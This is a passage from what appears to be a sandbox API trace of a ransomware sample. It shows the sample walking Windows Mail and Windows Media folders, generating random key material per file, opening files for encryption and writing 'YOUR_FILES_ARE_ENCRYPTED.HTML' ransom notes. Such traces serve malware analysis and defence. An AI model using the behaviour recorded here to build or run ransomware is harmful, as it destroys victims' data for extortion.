4 [0163.815] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0163.815] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0163.817] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4734) returned 1 [0163.817] GetProcessHeap () returned 0x270000 [0163.817] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7582578 [0163.821] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="B1") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="68") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="34") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F5") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="26") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="A9") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="4E") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="C7") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="8C") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="FF") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="41") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="D6") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="8E") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="E5") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="F6") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="68") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="3F") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="E1") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="98") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="7F") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="04") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="00") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="02") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="C9") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="99") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="2E") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="A3") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="40") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="C2") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="3B") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="E8") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="29") returned 2 [0163.823] lstrcpyW (in: lpString1=0x759262c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" [0163.823] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7582578, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.823] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7582578, lpOverlapped=0x7582578) returned 1 [0163.823] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42062444, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="SOFTBL~1.HTM")) returned 1 [0163.823] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 85 [0163.823] lstrcmpW (lpString1="Soft Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.823] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0163.823] lstrlenW (lpString=".htm") returned 4 [0163.823] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0163.823] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0163.823] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0163.823] CloseHandle (hObject=0x5bc) returned 1 [0163.823] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829961fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0163.823] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 84 [0163.824] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.824] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0163.824] lstrlenW (lpString=".jpg") returned 4 [0163.824] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0163.824] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0163.824] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10569) returned 1 [0163.824] GetProcessHeap () returned 0x270000 [0163.824] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa6d0 [0163.828] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="92") returned 2 [0163.828] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="87") returned 2 [0163.828] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="29") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="04") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="8E") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="87") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0F") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="F1") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A8") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="BE") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="53") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="DF") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="61") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="BA") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="00") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="83") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="20") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="6F") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="63") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="94") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="E3") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="52") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="03") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="AB") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="9D") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="EF") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="5E") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="05") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="78") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="CD") returned 2 [0163.830] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="32") returned 2 [0163.830] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0E") returned 2 [0163.830] lstrcpyW (in: lpString1=0x75ba784, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" [0163.830] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa6d0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.830] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa6d0, lpOverlapped=0x75aa6d0) returned 1 [0163.830] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x420ae704, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0163.830] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 81 [0163.830] lstrcmpW (lpString1="Stars.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.830] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0163.830] lstrlenW (lpString=".htm") returned 4 [0163.830] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0163.830] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0163.831] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=230) returned 1 [0163.831] CloseHandle (hObject=0x5c0) returned 1 [0163.831] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0163.831] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 81 [0163.831] lstrcmpW (lpString1="Stars.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.831] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0163.831] lstrlenW (lpString=".jpg") returned 4 [0163.831] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0163.831] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0163.832] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=7505) returned 1 [0163.832] GetProcessHeap () returned 0x270000 [0163.832] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7600058 [0163.836] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="02") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="6A") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="76") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="57") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F1") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="42") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="2B") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="37") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="4E") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="34") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="4B") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="64") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="C1") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="AD") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="C8") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="A8") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="28") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="D7") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B4") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="82") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="74") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="A9") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9F") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="C0") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="AF") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="EE") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="34") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="5F") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="08") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="42") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C1") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7B") returned 2 [0163.837] lstrcpyW (in: lpString1=0x761010c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" [0163.838] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x3a0, CompletionKey=0x7600058, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.838] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7600058, lpOverlapped=0x7600058) returned 1 [0163.838] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 0 [0163.838] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.838] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.838] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.840] CloseHandle (hObject=0x58c) returned 1 [0163.841] GetProcessHeap () returned 0x270000 [0163.842] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.842] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd49a6590, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0163.842] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 87 [0163.842] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.842] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.842] lstrlenW (lpString=".MSMessageStore") returned 15 [0163.842] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.842] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0163.842] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 76 [0163.842] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.842] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.842] lstrlenW (lpString=".pat") returned 4 [0163.842] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.842] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0163.842] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.842] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0163.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.843] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.845] CloseHandle (hObject=0x4a8) returned 1 [0163.845] GetProcessHeap () returned 0x270000 [0163.846] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.846] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0163.846] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media") returned 61 [0163.846] GetProcessHeap () returned 0x270000 [0163.846] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.846] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media" [0163.846] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\*") 